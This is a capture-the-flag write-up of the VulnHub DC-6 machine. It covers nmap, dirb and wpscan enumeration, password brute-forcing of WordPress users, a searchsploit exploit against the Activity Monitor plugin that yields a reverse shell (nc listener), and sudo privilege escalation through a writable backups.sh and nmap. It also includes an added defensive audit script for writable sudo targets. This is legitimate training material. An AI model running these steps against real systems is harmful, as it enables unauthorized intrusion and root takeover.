# DC6

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/DC6 192.168.1.115
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 07:20 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 07:20 (0:00:00 remaining)
Nmap scan report for wordy (192.168.1.115)
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy &#8211; Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:EC:F5:FF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

```

After that, as usual, we put the IP into the address bar and see what we get.

![](/files/-M7bYp0HupPOHJkktm5-)

We can see that the URL there uses a domain called `wordy`.

Let's open `/etc/hosts` and add an entry mapping the IP to `wordy`.

![](/files/-M7bb81B6bHy9I6p96Id)

Reload the browser.

![](/files/-M7bbF-0o9H43LOr9fbu)

We got a WordPress site!

### Dirb

```
dirb http://192.168.1.115
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 18 07:56:05 2020
URL_BASE: http://192.168.1.115/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.115/ ----
+ http://192.168.1.115/index.php (CODE:200|SIZE:53227)                                                     
+ http://192.168.1.115/server-status (CODE:403|SIZE:301)                                                   
==> DIRECTORY: http://192.168.1.115/wp-admin/                                                              
==> DIRECTORY: http://192.168.1.115/wp-content/                                                            
==> DIRECTORY: http://192.168.1.115/wp-includes/                                                           
+ http://192.168.1.115/xmlrpc.php (CODE:405|SIZE:42)          
```

As we can see, navigating to `wp-admin` redirects us to the login form.

![](/files/-M7bd_0UVzF_ix3CNTQH)

After poking around I still can't find anything interesting.

### wpscan

```
wpscan --url http://wordy --enumerate u
```

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/ [192.168.1.115]
[+] Started: Mon May 18 08:00:12 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 172.594 MB
[+] Elapsed time: 00:00:03

```

We can see that there are 5 usernames available: admin, graham, mark, sarah and jens.

Let's put them inside a text file.

![](/files/-M7bqL5CcyMqCGaqr2LU)

On the [vulnhub](https://www.vulnhub.com/entry/dc-6,315/#) page, the author gives us a clue about creating a new password.txt so that we don't need to waste our time brute-forcing it.

Then, with wpscan, type

```
wpscan --url http://192.168.1.115/wp-login --usernames name.txt --passwords pass.txt
```

Then we run the command.

![](/files/-M7br20hqUkPLzvbjp_n)

We get a valid username and password: `mark` and `helpdesk01`.

Let's log in to WordPress.

![](/files/-M7brINPs7MMHEO3UqxS)

We've successfully logged in to the account.

## Exploitation

### Searchsploit

Since the site has the Activity Monitor plugin installed, I went to `searchsploit` to search for an exploit.

![](/files/-M7bs6OI1aPd9MSKl9Az)

The exploit we want is the third one.

Copy the file to a directory that we can access later.

Then open that file in `nano`.

![](/files/-M7bsWzsBpSNNIm8Kzly)

We can see that a reverse shell will be called after we execute the file.

Change the URL from `localhost` to `wordy`, and set the reverse shell to your IP and the port you want to use.

We first set up the listener on our machine:

```
nc -nlvp 4444
```

Then open the file.

![](/files/-M7btFElYNOOP_NcfRlQ)

Click "Submit request".

Then we get a shell. Type

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

to get a proper shell.

![](/files/-M7buCi4f5vzrpkWGU2n)

Then navigate to `/home/mark/stuff`. There is a file called `things-to-do.txt`.

Open it up and we will see something inside.

![](/files/-M7buVlPsiXMxBbL0411)

We see that there is a `graham` user and his password, `GSo7isUM1D4`. Let's log out and SSH in as `graham`.

![](/files/-M7but_8yEuvqLB-R-c3)

## Privilege Escalation

When we type `sudo -l`, we can see this:

![](/files/-M7bv-zJ5uk0TOC634j2)

It seems we are allowed to run this script as the `jens` user.

Append `/bin/bash` to the `backups.sh` file so that we get a shell when we run it as the `jens` user.

![](/files/-M7bwgAhzzEtmnplfpFU)

Then, type:

```
sudo -u jens /home/jens/backups.sh
```

![](/files/-M7bvA8UoWDzWnqS86QP)
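The following is an added audit helper, not code from the original writeup, for the misconfiguration used in this step: a sudoers rule lets `graham` run `/home/jens/backups.sh` as `jens` while `graham` can also edit that script. It assumes a POSIX shell with `ls`, `id`, `dirname` and `cut`; the user and path names are the ones from the page.

```shell
#!/bin/sh
# Added audit helper, not part of the original writeup. It answers the
# question "can the user that sudo lets run this script also modify it?",
# which is the misconfiguration abused above: graham may run backups.sh as
# jens and can also edit it. Names (graham, jens, /home/jens/backups.sh)
# are taken from the page; the script only reads file metadata.

# can_modify PERMS OWNER GROUP USER "GROUPS"
# PERMS is the 9-character mode string from `ls -l` (e.g. rwxr-xr-x) and
# GROUPS the space-separated groups USER belongs to. Returns 0 if USER
# can write the file, 1 otherwise.
can_modify() {
    perms=$1 owner=$2 grp=$3 who=$4 grps=$5
    if [ "$owner" = "$who" ]; then
        case $perms in ?w*) return 0 ;; esac          # owner write bit
    fi
    for g in $grps; do
        if [ "$g" = "$grp" ]; then
            case $perms in ????w*) return 0 ;; esac   # group write bit
        fi
    done
    case $perms in ???????w?) return 0 ;; esac        # world write bit
    return 1
}

# audit_sudo_script USER PATH
# Checks PATH and its parent directory (a writable parent lets the file be
# replaced even when the file itself is read-only). Returns 0 when USER can
# modify it (a finding, like grep), 1 when it looks fine, 2 if PATH is missing.
audit_sudo_script() {
    who=$1 target=$2
    [ -e "$target" ] || { echo "$target: missing"; return 2; }
    grps=$(id -Gn "$who" 2>/dev/null) || grps=""
    for f in "$target" "$(dirname "$target")"; do
        set -- $(ls -ld "$f")                  # $1 mode, $3 owner, $4 group
        mode=$(printf '%s' "$1" | cut -c2-10)
        if can_modify "$mode" "$3" "$4" "$who" "$grps"; then
            echo "$target: WRITABLE by $who via $f (mode $mode, owner $3:$4)"
            return 0
        fi
    done
    echo "$target: ok, $who cannot modify it"
    return 1
}

# The case from the page: is the sudo target graham may run as jens under
# graham's control?
# audit_sudo_script graham /home/jens/backups.sh
```

On the box this prints a WRITABLE line for `/home/jens/backups.sh`; the fix is to make the script owned by `root` with mode 755 (or 700 for `jens`) and keep its directory non-writable by `graham`.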

We have successfully become the `jens` user. Then we type `sudo -l` again and get this:

![](/files/-M7bvR5Xi4kj8NDO1Y23)

We can go to the GTFOBins [site](https://gtfobins.github.io/) and search for nmap.

![](/files/-M7bvjLTpYUoKJoOK5u7)

Follow the instructions given.

![](/files/-M7bx_NyaPNuGAwsOtAv)

We got root!

Navigate to `/root` to get the flag.

![](/files/-M7bxhTg5tItW57ryBbS)

Congratulations!
